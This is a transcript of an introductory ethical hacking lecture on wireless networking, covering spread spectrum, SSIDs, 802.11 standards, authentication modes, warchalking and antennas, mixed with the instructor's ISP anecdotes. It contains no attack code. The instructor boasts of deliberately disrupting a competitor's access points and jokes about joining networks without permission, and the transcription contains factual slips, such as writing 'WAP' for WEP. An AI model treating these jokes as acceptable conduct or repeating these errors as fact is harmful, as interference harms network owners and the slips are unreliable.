Insights into Wireless

Wireless hacking, here we go. I'm so excited. My name is Dale Meredith and I'm going to be your
instructor for this particular course. I love this information. Just because of the fact that I've got a
background in it. It's kind of one of those things where you're very passionate about the things that
you know a lot about, right? (high voice) How passionate are you Dale? (elderly voice) Well, back when
I was a little boy I had my own little ISP service. (normal voice) Actually I found myself being
unemployed, this was right around 2001, right after 9/11 took place. The trading center that I was
working for didn't really plan correctly. They marketed mostly to transitional students. People that
were trying to make career changes and not necessarily to corporate. Well, after 9/11 took place, that
market really dried up. What I found, is that the market was also saturated. So, what I decided to do, I
live in a rural community, just north of Salt Lake City. In a city called Syracuse and we didn't have high
speed internet service. So, what I decided to do was start up my own ISP service and here's a lovely
picture of a handsomelooking guy on top of a water tower. This is about 125 feet up in the air and you
probably can't tell from my grip but it's like white knuckle time because I'm petrified of heights. What
I did was I went off and I rented space off of the Syracuse water tower. This water tower can be
seen because we're pretty, even though we're part of the Wasatch front, lot of mountains around
us. The city itself or this county is in kind of in a valley. So, it's relatively flat and this tower can be seen
for miles. So, because there was no high-speed internet out here at the time and I should say
affordable because ISDN was available. Boy, there's a term I just threw out that half of you just
went, "What's ISDN?" And the other half of you went, "Holy cow, I forgot about that term!" But there
was no affordable internet. Everybody was doing the ol' AOL, right? Where the computer screamed
at you. So, anyway I decided to start up this service. What I did is I put two T-1 lines into my garage. I
converted my garage over from a standard garage to an office and a server room environment. I put
an antenna on top of my roof, pointed it towards the Syracuse water tower and then put up an array
of antennas and access points on top of this tower. The company grew quite fast. It was actually one
of the fastest growing ISP services in the mountain west area. We actually went from zero to 600
customers. There's another picture of me and a good friend of mine, who is one of my workers. Putting
up some additional antennas on top of the water tower. We got so busy that we ended up having
to expand our service. We found another cell tower. If you do a little Google searching out there, you
might find an article out there about me. Concerning American towers. By the time that we were
done, I'm going to share with you some more stories, as we go through this course. About what I
experienced. By the time we were done, in Davis County, which is the county that I live in. You can see
here that I got the two red triangles here, representing the two towers. The thing that we have to
remember about wireless is that there's a lot that deals with what they refer to as line of sight. And
we'll talk about that a little later on as well. But we weren't able to get access to the internet to a lot
of customers, just because they didn't have line of sight. In the case of the water tower in Syracuse, we
put up several different antennas that had, they're called "sector based antennas" but they had
different types of modulational, or I should say, different degrees that they would provide service. We
went through and added tons of these. Especially as the company grew and grew. Including an omni-
directional antenna. We'll talk about in this course why omni-directionals are technically not as
powerful as sector based antennas. Of course, as the company grew, we then went through and added
that second tower and put in sector based antennas down there as well. We were able to cover pretty
much about an 18-20 mile stretch here of homes. This area was actually growing very very
rapidly. After growing this company, I went ahead and sold it off because I saw the writing in the
wall. We were finally getting Comcast, and at the time it was Quest, which I think now is
CenturyLink. Who knows what they are. Next week they'll be some other company. Anyway, they
finally started to come out in the area. But the service is still up and running. The gentlemen that I sold
it to, he actually sold it to another company. They're doing quite well because we have these new
subdivisions popping up and the commercial ISP's can't actually get out there fast enough. Next up, I'll
be showing you some slides from my family vacation. Well, if you know anything about me and my
courses, you know I love quotes. I've got one here for wireless. It's from Kevin Mitnick who's a famous
hacker. Who says, "New security loopholes are consistently..." And that's the key phrase there,
consistently. "Popping up because of wireless networking." Just when you think it's safe to get back on
the wireless network, we get another issuepopping up on us. That's what we're here to talk about. In
this course, we're going to go through several different subjects.We're going to start off in this
module and talk about the insights into wireless. Making sure you have a good foundation.Some of it
may be kind of older but you'll need to know that information for your immediate future. Wink,
wink. Hint, hint.Nudge, nudge. That's my hint that you might see something in a possible exam, that
may be associated with this particular course. Can you tell, I can't tell you what may or may not be on
an exam? But we'll make sure you have a good firm foundationof wireless. We'll then go through in
another module and talk about the encryption that's used in wireless. Okay, let's face it folks, nothing
is unhackable. If you don't believe me, ask Apple and the FBI about hacking an Iphone. We'll then talk
about the different threats that become available because of wireless. Again, knowing is half our
battle when it comes to our ethical hacking or looking at this from a security specialist
perspective. We'll then go through and take a look at the methodology of hacking wireless. You're
going to see a lot of similarities. Between what we've talked about in some of the other
methodologies when it comes to hacking networks. It's just that this time it's on the air. So, that
actually opens up a new media. A media that we can't see. And because we're talking about
wireless, another wireless technology that is out there,that's extremely popular, is Bluetooth. So, we
will take a look at how we can hack Bluetooth. We refer to it as bluejacking. And how vulnerable we
are because of Bluetooth. And so you don't end up in the corner of the room, shivering in fear,
yelling,"Daddy make the bad man go away." we're going to talk about the countermeasures. Again,
remember when it comes to countermeasures, the concept is, to slow the attacker down. We can not
stop an attacker. Especially when it comes to wireless. So, we'll start off in this module, of insight into
wireless. We're going to go through and look at some terms that you have to make sure you
understand. Some of them may be terms that you're just familiar with the term but you may not
actually know what it represents. Some of those terms may be relatively new for you as well. We'll
then talk about the advantages and disadvantages to wireless. Then we'll go through and look at the
different types of wi-fi networks. (funny voice) Uh, Dale what do you mean by types of wi-fi
networks? Isn't it all just wireless? (normal voice) Yeah but, we create different types of
networks based off of wi-fi. Then we'll go through and take a look at different wi-fi standards. I know,
this is going to be the boring part of the lecture. We talk about the different 802.X standards. But you
need to know those for your,wink, wink, immediate future. Also talk about wi-fi authentication
modes. Now, this is completely different from encryption.There are two different types
of authentication modes, that again you need to make sure that you have clear in your mind.Another
wink, wink. Hint, hint. Nudge, nudge there. Then we'll talk about something called chalking. Some folks
call it WarChalking. Us cool guys, we just call it chalking. This is actually kind of a technology, not really
technology, but a concept that is being deprecated out because of how technology is advancing. But
we need to make sure we understand it so that when we look around, we see things a little
differently. And then of course, we'll talk about different types of antennas. See there's martian
antennas. There's T.V. antenna, nooo. I'm going to show you different types of antennas that we use
in wirelessand why some are better than others. And I'll also give you some helpful hints of how you
can improve the performance as well as the security just based off the antenna type you select. So,
let's adjust those antennas, let's see if we can't get a little bit of reception and let's get going.
New Terms to Learn

Okay, let's start off with new terms that we need to understand. Now, some of these terms you may
have heard of and had no idea what the acronym stood for or actually what was behind the
acronym and some of them you might not have heard of before. Let's start off first with looking at
one, that's called frequency-hopping spread spectrum. Which is also known as,FHSS. Yeah, say that
one three times fast. Now, F-H-S-S-S-S-S-S, somebody stop me quick. Was actually invented by,
anybody, anybody? I'll give you a hint. (funny voice) Uh, Dale why'd you put a picture up of a beautiful
woman, who's obviously a movie actress? (normal voice) Well, this is Hedy Lemarr. Now, Ms. Lemarr
was not only a famous silver screenactress but she was also very intelligent. In fact, she was an
inventor. It's kind of funny. I watched a documentary about her.She was so beautiful that a lot of
men, again you have to think about the time of when she was around, didn't take her serious.As far
as some of her inventions were concerned. But she's also famous for not only the spread spectrum
creation, but for something else that deals with computers. Anybody know? Don't Google it. Stop
it. Here let me give you another photo so you can take a look at her. (funny voice) Uh, gee Dale she
looks like Delilah from Samson and Delilah. (normal voice) Yes, that's right. That was one of her famous
roles but that has nothing to do with computers. Anybody else? Let me zoom up on this picture for
you. Do you see it yet? She was actually the model that is on the Coreldraw box. Ohh. Everyone's
going, "Ohhh!"Coreldraw, yes." I think she was on the box up till about version nine, as I recall. So,
how was she involved in this? Well, it goes back to World War II, she came up with a quote, "Secret
Communication System." To actually help combat Nazis during World War II. They did this by
manipulating the radio frequencies at irregular intervals between transmissions and
receptions. Hence, hopping. Her invention, also formed an unbreakable code because it was hopping
around. That nobody could listen in. So, that classified messages could be transmitted without being
intercepted. Now, typically FHSS operates within the 900 megahertz to 2.4 gigahertz range. At the 900
megahertz range, we see things like Bluetooth. As well as, non-line of sight technologiesbeing
utilized. We actually looked at the 900 megahertz frequency for our stuff, just because the user didn't
have to put an antenna on his roof. He could just put a little antenna on the side of his computer
desk and it would go through walls. Now, a variation of FHSS, is called adaptive frequency
hopping. Which, is also known as Bluetooth. Now, when it comes to FHSS, how it works is like
this. Within the spread spectrum itself, we have several different channels. Actually we go all the way
up to 14,but I was running out of room here. But I'm going to get the primary ones here. So, channel
one actually kind of flows and overlaps into channel two and three. And guess what, if I look at channel
two, it overlays between one and up to four. And you can see that it just goes across here and fills up
the spectrum. Well, with any type of spread spectrum technology, if you have a lot of devices
communicating on the exact same channel, that equals to a degradation of signal. So, what Hedy came
up with, and I call her Hedy because I talk about her a lot and I'm sure she and I would be good
friends. Is that she created this technology that allows the channel, or transmission, to jump between
the different channels. You actually do this, with what they refer to as a hop sequence. So, it is very
hard for anybody to intercept this traffic. In fact, by looking at this information or looking at a
frequency hopping environment, with a spectrum analyzer, it just looks like interference. Now,
obviously the two antennas, the receiving and sending antenna have to be on the same hop counts. So,
they know which channel they're hopping to and the next data packet transmission. Now, you may be
thinking, "Dale, that is so cool. "Why don't we use that today?" Well, the problem with FHSS is its
speed limitations. We'll talk about that a little bit later on but I'll go ahead and kind of spoil it for you
here. It's limited to three megs. (funny voice) Uh, yeah Dale, that's not very fast. (normal voice) I know,
but back in my day we offered high speed internet, up to 512k and trust me, people thought that was
blazing fast. And they paid me $69.00 a month to me for it. It was great. I think my slowest speed was
128k and I charged $19.90, $19.99! So, next we have direct-sequence spread spectrum. This is
probably the most popular one because it's just known as DSSS. Now, it's the same channels. The same
frequencies but what happens is that you have to select which channel, both the sending and receiving
antennas going to be on. And they stay there. Well, this obviously makes it easier for someone to
intercept traffic. It also, as we talked about before, because the channels how they overlay with each
other, can create interference. For example, if you had a, so you could end up with interference from
other wireless devices. Like cordless phones. Microwaves. Actually fluorescent lamps will cause
interference. Well, with these channels, you can see them overlaid here. The questions usually comes
up with, "Well Dale, how do I select a channel "that I won't interfere with another channel?" Well,
believe it or not, we call it the three sweet spots. The three sweet spots are right here. Channel one
does not interfere with channel six. Same thing between channel six and 11. There's actually a
separation. Some people might think, Well, five would be okay because five doesn't necessarily
interfere with one. Well, technically in the spectrum analyzer, that's not a clean separation. So, now
there's an issue that can come up if you get DSSS and FSSS. Man, that's a mouthful to say. If you get
them too close to each other.How I'm going to tell you about this, is we're going to go back down
memory lane, one more time with, "Story Time with Dale." You remember with direct sequence
spread spectrum. I might shorten this up and just say, "DS." from now on. And FH for frequency
hopping. Remember, they stay on the same channel. So, I decided that I wanted to start up my own ISP
service, which I mentioned earlier. Now, the Syracuse water tower, even though it's owned by
Syracuse City, it's actually in a different city. And the city, we're just going to say it's the city that want
to make Dale mad city. This city required me to go through and get a conditional use permit. At least
that was the condition of my renting the space on the top of the Syracuse water tower.Syracuse City
said, "You need to go to this "particular city and say you can get this permit." So, I put in my
application and I appeared there and little did I know that the consultant for city of want to make Dale
mad, was actually a competitor of mine.He told them that my implementation would interfere with
their wireless that they put inside of their police vehicles. And they were using DS. So, when I
appeared, the city came out and said, "Sorry, we're not going to let you put up "your antennas, go
home." I tried arguing the point with them. With the city council saying, "Hey, this is a public
frequency " you can't legislate this." They said, "Sorry, you're not going up. "We're not going to give
you the permit." As I walked away I began to plan my revenge upon my nemesis. (evil laugh) Yeah, I
called the FCC. Told the FCC what was happening. Well, the FCC said, "Hang on, I'd like to throw a flag
on the play." They contacted the city offices and I got called back into a meeting with them. A private
meeting with the city manager and my competitor. I say competitor lightly because they were
charging astronomical rates.Like, $600 for equipment. We were allowing our users to rent the
equipment. Anyway, I got called back into a meeting. They said, "Listen, we're going to go ahead and
let you "put up your antennas because the FCC "contacted us and said that if we stopped you "because
it's a public frequency "that they would actually come "and confiscate our equipment." Oh, it gets
better folks. So, going back to direct sequence. One of the reasons why I decided to go with frequency
hopping, one was so that I could have more antennas on the same tower but it also did something
kind of interesting. So, here's the direct sequence infrastructure. What it looks like. Well, when you
add frequency hopping to that environment and my antennas started hopping around, it would hit
the channels that my competitor was on and, oh darn it reset their access points. It's a shame. Now,
if anything. This story should tell you that you shouldn't mess with me because I've been trained by
the best.Look at that innocent little grin. I'm talking about Chuck Norris there. Not my grin. Okay,
another term that we need to understand is called basic service set identifier. Now, some of you guys
may confuse this with something called SSIDs. This is called BSSID. Very simple. Now, if you remember
our access points, they have their own MAC addresses. I don't want you to confuse this with the
SSID. We'll talk about that here in just a second. So, the BSSID, actually consists of the MAC address of
the access point. That has associated to it a BSS. Or a basic service set identifier. So, a single access
point together with all the associated stations is referred to as BSS. This way here the access point
acts as a master controller for all the stations with any BSS. Part of that is dealing with what they refer
to as the cell identifier. The cell identifier is just the antennas that are associated with the BSS. Now
the BSSID, as I mentioned before, has to do with MAC address of that device. What happens is that
the MAC address gets incremented and that is broadcasted and used for communication in the air over
wireless. If you've got a wireless network that is broadcasting on multiple bands, like, A-B-N-G, it gets
incremented again and again. So, it can be used for each one of those bands. If you go through and
use some type of packet capturing tool, you should be able to see the wireless MAC address floating
around the air. You can also see the access points broadcasting the BSSIDs. With Wireshark I think you
can filter it out by doing a show ap BSS-table. But that's just more information you really need to
know. Just something that stuck out in my little brain. We also have something called the SSID. Or the
service set identifier. This is what everybody's familiar with, when it comes to wireless right? It's
actually the network name. It can be up to 32 characters in length and the SSID is actually attached to
every single wireless packet that goes out onto the air. This is how you can have multiple access
points transmitting data to different systems but dropping, just like we see with a normal network
environment. If the packet's not destined for that particular network. It gets dropped. It's the same
concept. We just use this SSID because in the air there's other information floating around. Or maybe
it's not information. Maybe it's just interference.

Advantages & Disadvantages

Okay, before we dive deeper into some of the other subjects concerning hacking wireless
networks, let's first pause for a second and talk about the advantages and disadvantages of this
media. It's kind of weird to say media because there's really nothing there. Or I should say, there's
nothing in between. So, let's first talk about the disadvantages because from a security perspective, it
is the biggest issue for us with wi-fi. Now, obviously without any type of security enabled, ethernet
would be more secure. Duh, because you have a limitation of the media itself. I hate to break it to
you but there's a lot of misconceptions when it comes to the authentication mechanisms that we can
use. Another disadvantage is, obviously, bandwidth. It's kind of funny because everybody always
thinks when they go off and buy a new router or new wi-fi connectionand it says that it's a hundred
megabits. They think, "Oh, I'm truly getting a hundred megabits." Well, you're not. How they calculate
the bandwidth, or the advertisement of the bandwidth, is by taking both the sending and receiving
speeds and combining those together. So, for example if you had a router that said it was 200
megabit, they're technically talking about a router that supports a hundred megabit up and a hundred
megabit down. Now, the other issue for us, as far as a disadvantage, when wireless is concerned and
bandwidth is the more people you get on the wi-fi network, the slower the speeds can
become. Another thing that can actually effect bandwidth is reception quality. The further you get a
way or weaker the signal is on your wi-fi device, the slower speeds you'll experience. That's how the
devices are designed to work.Obviously you don't want to transmit at a high rate of speed, if you're
losing packets because your receptions are not strong.So, we're going to slow things down a
bit. Another disadvantage is obviously upgrades. When they come out with a new speed we're
upgrading equipment like crazy. Not only at the access point level but also on the devices. Then we
have to worry about if they're backwards compatible. And of course backwards compatibility always
means we have a security risk involved.Another thing, and this is probably one that a lot of folks don't
really pay attention to, and that is interference. Not interference from other access points. However,
that is a concern but interference from other devices that have nothing to do with wireless networks. I
mentioned before that fluorescent lights can interfere. Bluetooth devices can interfere. Cordless
phones, anything that's kind of wireless itself, as well as anything that puts out a microwave. In fact,
hey there you go right there a microwave. You know the cook your popcorn up in. It can actually cause
interference because it's microwave technology that we're utilizing here. Okay, now that I've bummed
you out. You don't want to use wi-fi anymore. Let's give the shiny side of things here. Let's talk about
the advantages of wi-fi. One of the biggest advantages, from the IT perspective is, hello,
installation. Put a box up here and I've got access anywhere I want to go. I no longer have to rely on
ethernet cablingbeing ran through a wall. Or somebody wanting to move their desk in their office and
have to reroute cabling for them. Or if I buy the building next to me or a business expands to the
building next to us. I don't have to worry about running cables across. Easy connectivity is also an
advantage. Almost everybody knows how to hook into a wi-fi access point. Or into a wi-fi network. But
give somebody a crimping tool and some cable, watch their confused look. Watch their confused look
on their face. So, it's very easy to add devices. I just got a report from my wife who happens to be a
HR director for Best Buy, and Best Buy just announced that most homes today, have up to 13 wi-fi
devices in their homes. One of my favorite advantages is the mobility. Being able to again, move
around. As I said before with installation, I don't have to worry about if I want to movefrom one room
to another. Especially in my home. Or if I want to go out on the back patio and just relax. I can take
my laptop with me. In my actual neighborhood, those of you guys who have heard the story, I have a
networked neighborhood. A bunch of us who live right next door to each other, we're all in IT, and we
have network cabling running between our homes. We have different types of servers. We have a
movie server. We rip all of our DVDs. We have a MP3 server. We've got VMs that we can play around
with. It's just kind of fun. One of my neighbors is a database administrator. Another ones a IT Project
Manager.Another guy's a Linux guy. Then there's this super guy, that teaches a lot. (laughs) But we set
up our wi-fi access points in our house so that we can roam. So, if I get too far out of my backyard and
into my neighbor's backyard, I automatically roll over to his access point. Now, one of my favorite
things to do is, I use my cell phone as a hotspot all the time. I'll tell you the reason why I do that. But
first let's talk about public access. That's an advan... Whoa! Hang on a second. Public access is an
advantage? Well, they want to make it seem like that way because hey I can go down to
McDonald's and jump on the wi-fi. In fact, I just happened to visit my local Wal-Mart the other day
and they've got a sticker on the front of their doors that says,"Free wi-fi at our store." And I'm looking
at this and going, "Oh crap!" Not, "Oh cool!" Now, the reason why I said I'd talk about this here in just
a second, when it comes to mobility, I use my phone all the time as a wi-fi hotspot but only for my
devices. I do that because my phone has a vpn connection. I actually run a vpn software. So that
anything that I do on my systems can't be, or don't go through a public wi-fi access point. You guys
have probably heard this one before as well. Please do yourself a favor and if you see an access point
that says free wi-fi. Don't get on it. A majority of those times, those are rogue access points. Or an
attacker trying to get you to hook into his access point and he then becomes a man in the middle for
you. Isn't that nice of him? Provide you free wi-fi and all he gets is your bank account.

Types of Wi-Fi Networks

Okay, so let's talk about the types of wi-fi networks that are out there. (funny voice) Dale, what do
you mean by types of wi-fi?Isn't it all just wireless? (normal voice) No, not really. Matter of fact here's
where we're going to play around with some terms.Because we use terms today like access point or
we make call it an A-P. We envision it a specific way. What it is today. But access points started off a
little differently. First let's talk about, the first type we refer to as an extension to networks, and what
we mean by that is that initially access points, notice my little asterisk here, because when we say
access points we have this tendency of thinking of the little Cisco, or Linxus, or D-link product. I should
run through all the different brands, so I don't have to pay any type of copyright infringements
here. But we envision these devices that are actually not only access points but also switches and
routers. But you can purchase just an access point that all it's designed to do is to be a bridge to bridge
wireless folks so they can gain access to the wired network. Now, another type is just simply two of
these extension networks that are designed to communicate with each other. We refer to these as lan
to lan networks. We often see this being done between buildings. Another type is what we refer to as
a multiple access point network. This is where we have multiple access points representing the
same, remember our BSSID? Representing the same BSSID, so that no matter where you go within the
building, or within the environment, your traffic is directed back to the same network. Now, in order
to appropriately deploy these, you need to make sure the access points overlap each other as far as
coverage is concerned. This actually makes it so the user has the ability to move around or
roam between the two connections. Never losing connectivity. Then we also have something that
we refer to as cellular access networks. This is where we use a cellular service to provide access to the
internet. Back in the day I was actually impressed, got a hold of a neat little router that had a slot on
the back that I could actually plug in a PCMCIA card that was sold by a local Telco that would give me
wireless network. It was great, we used it in trade shows. We didn't have to pay for internet at the
trade show. Now, if you want you can think of this as the grandfather, to what we refer to as our
cellular hot spots today. Where our phones turn into a full access point for us, so that when you're at
the airport, you can sit down, turn on the wi-fi on your phone. Let your tablet hook in and hey, why
don't you let me hook in there. Or, if I don't have your permission maybe I'll just make my way in
anyways.

Wi-Fi Standards

So, let's talk about wi-fi standards. (snobbish voice) We should all have standards. I personally don't
deal with any wi-fi that's less than dual band gigabit. Anything less, is just for the little people. (normal
voice) Now, (laughs) what I mean by this or wi-fi standards is, I need to make sure you understand
some concepts. When it comes to these standards. First of all, wi-fi for the most part, is what we refer
to as line of sight. Which means the antennas have to see each other for the optimum transmission
speeds. Anything that you place in between wireless devices degradate the signal. So, for example, a
tree may not necessarilystop the signal but it's going to break it up a bit. Here's what really funny. Let's
have a flashback. (mimics flashback tune) Back to my ISP days. We would go through and install
people and we would jump up on the roofs and we would look out to see if we could see the water
tower. It was a very very bright blue object that you could see for miles. Many times we would get up
there not realizing the time and season. And it would be in the fall or winter. We'd go, "Oh yeah,
there's the "water tower, right over there." We'd set up the antenna, point it right at it.. Things were
great till spring came along. And then all of a sudden we had customers calling up saying, "Hey, my
speeds are getting slower." And we'd go back out there, jump up on the roof and go, "Where'd the
water tower go?" There's a bunch of trees in the way. It's because the leaves filled in. Now, different
objects can create, what we refer to as reflection. We'll talk about that here in just a second. One of
the biggest culprits of reflection is, yeah, buildings. So, in your home when you set up an access
point, the sheetrock and studs in the wall slow the signal down.Just like what we saw in the tree. If
you place your access point in the basement because of, typically cinder blocks that are used down
there or concrete, the signal gets absorbed and won't pass through. The same thing applies with
steel. In fact if you go to my kid's elementary school, you walk in the front door, it's such an old
building, I guess I shouldn't complain because it's well constructed obviously but it's made out of bricks
and mortar. It must be some thick brick because literally as soon as I walk in, my cell phone goes from
four bars to zero. Again what's happening is that the signal's being reflected off of the material. One
of the other biggest culprits, it's kind of interesting and cool, little side notes here for you, is water is
a great reflector. Again, back when I had my ISP days, we would see how far we would see our
signal and if we were going to cross land we were limited to about eight to ten miles. Now, I just
happen to live near a huge lake of salt. In fact you might say, it's a great salt lake. (laughs) Just off of
the lake, or in the lake, is a place that's called, "Antelope Island." There's a causeway that you can
drive out to it. So, we drove out to it and it was a distance of about 10 miles to the water tower. But
what's amazing is our signal was like 83 percent strong. Because what happens is that the
microwave just simply bounced. Almost like a rock skipping, off of the surface of the water. Which
gave it more distance. Normally the signal would just go into the ground and be absorbed. Okay,
there's something else you need to realize, when it comes to line of sight. It goes something like
this, we know that we need to have line of sight between wireless devices. In this case here we've got
two different buildings with access points. We're trying to connect them up together. Now both of
them are transmitting. In this case here they're vertically polarized. So, this is often referred to as the
beam-width. Well, where of both of these beam-widths intercept with each other. We have something
referred to as the fresnel zone. The fresnel zone has a rule to it. At this intersection, and there's a big
calculation out there you can go do, but I'm just going to give you a rule of thumb. Here it is, is that
the fresnel zone can not be blocked more than 40 percent. If it is blocked more than 40 percent you
have the possibility of not only losing bandwidth but also not having any signal at all. This was another
frustrating thing for me back in my ISP days because again we would go and get a customer up and
going, a business up and running, and all of a sudden another building would go up all of a sudden. Or
a tree would get taller and intersect into that fresnel zone, even though we'd get on the roof of the
one building and we could see the water tower clear as day, we couldn't get a signal. Now, many times
about this point, I have students usually ask me, "Well, Dale, does snow or sleet, "or rain, or fog cause
issues?" And the answer is, "Well it depends."Not normally so much. In a standard rain storm,
no. You're not going to see a huge decline in transmission. Extremely thick fog, absolutely, because
humidity or moisture in the air, the more dense that it is. Remember how the great salt lake, the water
reflected the beam. Well, guess what? If the moisture or the humidity is too dense in the air, it's going
to reflect my signal.Another thing that could actually effect signal strength, as well, is high
wind. Especially if the antennas are not secured down adequately. If they sway just a couple of
inches you could actually lose signal strength and bandwidth. So, now that we got that out of the
way. I'm just going to quickly show you the different wi-fi technologies that are currently out, unless
I'm missing one. I don't think I am though. Nothing in your immediate future. This is just a great
reference chart. Because we talked about different technologies here. Now the latest and greatest, at
least as of the publishing of this particular course, is 802.11AC. I don't know if we'll see anything
faster for sometime, in fact, the time frame between N and AC was about six or seven years.Which is,
in computer years, like a lifetime, right? Now, one of the big advantages of AC is that it does keep you
cool. No, that' not what AC stands for. Maybe it's always cool. But it's based off of the original
802.11N. Because they did this, they actually extended the air interface to a wider RF band. Actually
up to like 160 megahertz, and they allow up to eight mimo connections. Or streams. It allows them to
be backwards compatible. With 802.11G, B, and A. Now, please always note that when they talk
about speeds, these are theoretical speeds. Here'd be my other suggestion for you too, this one ended
up biting me in the backend when they released 802.11G. I rushed off to get the latest and
greatest. The standard had not been set by I triple E. Some of you guys may have experienced this but
back in the old days, you'd go off and buy a Netgear wireless card and it wouldn't work with a D-link
router. It's because it was Netgear's own version of G and same thing with D-link. They wouldn't
communicate properly with each other. So, make sure that the I triple E Standard's been ratified,
which AC was actually ratified back in 20-14. So, you should be good to go. Now, 802.16, also known
as WiMax. There's something we don't hear a lot about the reason being is because it's typically used
by commercial companies. To provide, as what they refer to, as last mile wireless broadband access to
DSL or cable. So, we sometimes see it used for microwave back halls.Unfortunately, something came
a long called long term evolution or LTE. So, WiMax is kind of gone the way of the dodo bird.
Wi-Fi Authentication Modes

Let's talk about wi-fi authentication modes. Now, this has nothing to do with the type of encryption
we're going to be utilizing. When I triple E released the 802.11 Standard they actually defined two
different methods that wireless devices could use to authenticate to a wireless access point. Before
actual network communication would take place. One of these two methods is referred to as open
system authentication. Now in order for OSA to actually work, the SSID of the computer should
match the SSID of the wireless access point, or the WAP. First, the computer or the device, sends out
a probe request.Looking to see if there's actually an access point out there with that SSID and the
access point responds back with a probe response. Next the computer, or device sends a request
for an authentication request. The access point generates an authentication code. Usually it's
randomly, and sends it back in an open system authentication response. At this point, the device then
accepts that authentication code and sends an association request, which again the access point
responds with an association response and the system becomes a part of the network. As, long as the
session continues and as long as the computer remains within the range of the original access
point. Now, the other mechanism is referred to as shared key. Again, to start the connection
process, the computer sends a request for authentication to the access point. The access point,
responds by generating a sequence of characters, called a challenge text. The computer encrypts the
challenge text with its WAP key. Hey, this is where WAP comes into play, right? The computer then
encrypts the challenge text and transmits the message back. The access point decrypts the
message and compares it to the result of the original challenge text. If there's no discrepancies, the
access point sends an authentication code. The computer is then able, or device, then able to hook
into the network. Again, so long as the session stays open or as long as the device remains within
range of the original access point.Now, share key may look familiar to you because it's utilized
primarily for, duh dun dun, WAP. So, guess what folks, it's time to play Wireless Threat! Hey, I'm your
host Dale and my lovely assistant Julie here is going to help me out. So, here's the question,which
authentication process is the least secure? (sings dramatic beat) Is it open system or shared
key? (mimics buzzer) If you selected open system, you would be wrong. Shared key is actually a less
secure mechanism and the reason behind this is because the shared key is trans... It's shared, it's
transmitted. So, even though open system sounds like it's worse, we're going to use other types of
mechanisms to secure down the network. Thanks for playing, Bob tell them what they won! (funny
voice) You've won a brand new car!

Chalking

(normal voice) Okay, let's talk about chalking now. Some people call it war chalking. Other people
might call it hopscotch. No, not really. So, there are different ways we can identity networks. At least
wi-fi networks. We can do this by doing something called WarWalking. Where we have a mobile device
with us and we just simply walk around a building and it picks up access points and records information
for us. We also have something called WarFlying. This is a relatively new concept and I think with
drones it's going to get even more popular but back in my day they used model rockets. You know the
ones as a kid you'd shoot them they'd go right up in the air? There's some kids who attached a wi-fi
access point to one of them and shot it up. They picked up like a 15 mile range of wi-fi access
points, that it picked up as it went up and came back down. We also have something that's referred
to as WarDriving. You're in for a treat. In one of my other clips I want to take you actually on a
WarDriving outing. So, you guys can see how can be done. Then we have something that's
called WarCrawling. This is where we put access points on babies and just let them loose. No, I'm
teasing. There's no such thing as WarCrawling. i just had four squares and needed to fill up the fourth
one. So, after we've identified those networks, we want to make sure we can share this
information. And that's actually where WarChalking came to play. Again, this may be a little bit of a
deprecated technology or concept because what we've done in the digital age. Most of the stuff now
is online. But it got it's start, basically back in 2002. By a gentleman by the name of Matt Jones, who
posted and promoted the idea on his blog. Of being able to leave behind marks that would help
identify networks to other people looking for wi-fi networks. It was inspired based off of the Great
Depression and the hobos. Or I should say the hobo community. Hobos themselves, when they
traveled, they communicated by leaving behind different marks that represented different things. So,
other hobos would know, for example, that it was okay to sleep someplace. Or that there was a doctor
that would help them. Or that there was a policeman nearby,who kept an eye out. And they would
chalk these using either chalk or coal and the hobos would write this code with chalk or coal to the
brotherhood. You may be thinking, "Dale, that's a long time ago." Well, guess what, it's still being
utilized today.What with wi-fi networks and identify them, we use a little bit different symbols. Let's
first start off by showing you what an open and closed node symbol would look like. I betcha can't
figure out which one's which. Open meaning, it's typically free.Closed meaning that it's locked down
somehow. And if it's locked down we need to identify the encryption that's used. So, either it's a WAP
encryption or it's a paid service. With the node identification at the bottom, we typically list the
speeds and above the representation of the node we would normally see the SSID. If by chance they
were doing any type of filtering, we would also use this symbol to identify that, in this case here, it's a
MAC filtered node. Now what's funny is that whenever I teach this concept usually I hear people
go, "Wow Dale, I've never seen any of these symbols around." Well, the problem is you haven't been
looking for them. Let me show you. So, what do you got here? You've got an open node that's
anywhere fromone to five megabit and it's SSID being Cadence. Here we actually captured
somebody showing an open wi-fi access point.Now this one here we have an open node that's called
Linxus, that's running at five megabit. Then we have another node,that's closed using WAP. It's also
five megabit and it looks like the SSID is a number. Here's an easy one. This is an open node, running
two megabit. It's actually running 802.11B and the SSID is tsunami. Which, hmm anyone know that
one? Yeah, that's the default SSID for a Cisco access point. Now, maybe next time when you're
walking down the street and you see some kidswith laptops, playing with chalk, you might want to be
careful. Or pay attention to what they're drawing. I think these are actually Troy Hunt's kids. Now,
there's one symbol out there that you have to be very very careful about. I'm going to draw this one
out so you can take a look at it and see if you can guess what it is. Now, this one has some strange
characters, or lines drawn to it. There are some open and closed nodes associated to it. We often refer
to this one as a very secure... Wait a second. This symbol means, "Hey, guess who's nearby?" (sings
Batman theme song) I'll let you finish that one.

Antenna Types

So, let's talk about antenna types. Some of you guys may be familiar with only one or two of these. So,
I want to make sure that you understand these. It's kind of funny, after you study wireless, it's amazing
you'll start looking around as you drive and you'll start to see antennas that you never realized were
there before. They pop up in the strangest of places. When it comes to antennas, it's kind of like that
old saying, "Different strokes for different...uses?" Okay, yeah. Depending on what you're trying to
accomplish, will determine what type of antenna you'll want to use. Let's start with the traditional
one, that everybody knows about. It's called the omni-directional antenna. You've all seen something
that looks just like these, right?The big fat one there, we usually see in the back of our access
point. That first one there on the far left, that's actually a commercial grade access point, that we
typically install on top of a mast. Now, with omni-directional, it means that the signal is transmitted
360 degrees. By default it broadcasted out horizontally. Meaning that our beamwidth starts at the
antenna and moves in a horizontal direction. Now, because it's broadcasted in 360 degrees, if you
have certain amplitude on your antennayou actually lose power. So, an omni-directional antenna is
not as powerful as some of other types of antennas. I'll show you why. Before I do that, I want to show
you how an antennas actually made. What's inside one of these things. I'm going to demonstrate this
by showing you just a picture of a pen. That would be the antenna itself and inside it's going to have
wire that's tightly wrapped around it. So, from here, the signal would go out horizontally. If you wanted
to have it go vertically. This is actually vertical polarized, omni-directional antenna. If you were to open
it up, I had one of these and I opened it up and I was really frustrated because I paid a lot of money
for it, thinking it was specially designed. All they'd done is taken the coilinstead wrapped it this
direction. Yeah, I paid like $300 for it. Really mad. Now, believe it or not, if these two antennas were
on the same channel, because they're broadcasting their signal vertically and horizontally, there's
technically a hundred degreesof separation between them. They won't have any interference. But
again, a weaker signal. Then say, for example, a directional antenna. This is a commercial directional
